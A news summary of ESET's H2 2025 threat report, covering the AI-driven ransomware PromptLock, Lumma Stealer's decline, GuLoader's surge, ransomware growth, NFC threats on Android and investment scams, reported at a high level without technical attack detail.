ESET H2 2025 Threat Report: First AI-Driven Ransomware PromptLock Discovered, Lumma Stealer Collapses
ESET's H2 2025 Threat Report reveals the first known AI-driven ransomware, PromptLock, and a 40% projected rise in ransomware victims, while Lumma Stealer detections plummet 86% after global disruption.
ESET Research has published its H2 2025 Threat Report, offering a sweeping view of the evolving threat landscape. The report highlights the discovery of PromptLock, the first known AI-driven ransomware capable of generating malicious scripts on the fly. While artificial intelligence has primarily been used for crafting convincing phishing and scam content, PromptLock signals a new era where AI powers malware directly.
Lumma Stealer, once a dominant infostealer, saw its detections plummet by 86% in H2 2025 compared to the first half of the year. After a global disruption in May, the malware briefly resurfaced twice but its glory days appear over. A significant distribution vector, the HTML/FakeCaptcha trojan used in ClickFix attacks, nearly vanished from ESET telemetry.
In contrast, CloudEyE (also known as GuLoader) surged nearly thirtyfold in ESET telemetry. Distributed via malicious email campaigns, this malware-as-a-service downloader and cryptor is used to deploy other malware, including ransomware and infostealers like Rescoms, Formbook, and Agent Tesla.
Ransomware victim numbers have already surpassed 2024 totals well before year's end, with ESET projecting a 40% year-over-year increase. Akira and Qilin now dominate the ransomware-as-a-service market, while low-profile newcomer Warlock introduced innovative evasion techniques. EDR killers continue to proliferate, highlighting that endpoint detection and response tools remain a significant obstacle for ransomware operators. H2 2025 also brought an unpleasant flashback to the Petya/NotPetya ransomware when ESET researchers uncovered HybridPetya, a new derivative capable of compromising modern UEFI-based systems.
On the Android platform, NFC threats grew 87% in ESET telemetry. NGate, a pioneer among NFC threats first described by ESET in 2024, received an upgrade with contact-stealing capabilities, likely laying the groundwork for future attacks. RatOn, entirely new malware on the NFC fraud scene, brought a rare fusion of RAT capabilities and NFC relay attacks, showing cybercriminals' determination to pursue new attack avenues.
Fraudsters behind the Nomani investment scams have also refined their techniques, using higher-quality deepfakes, AI-generated phishing sites, and increasingly short-lived ad campaigns to avoid detection. ESET telemetry shows Nomani scam detections grew 62% year-over-year, though the trend declined slightly in H2 2025.
The full report is available on ESET's WeLiveSecurity blog.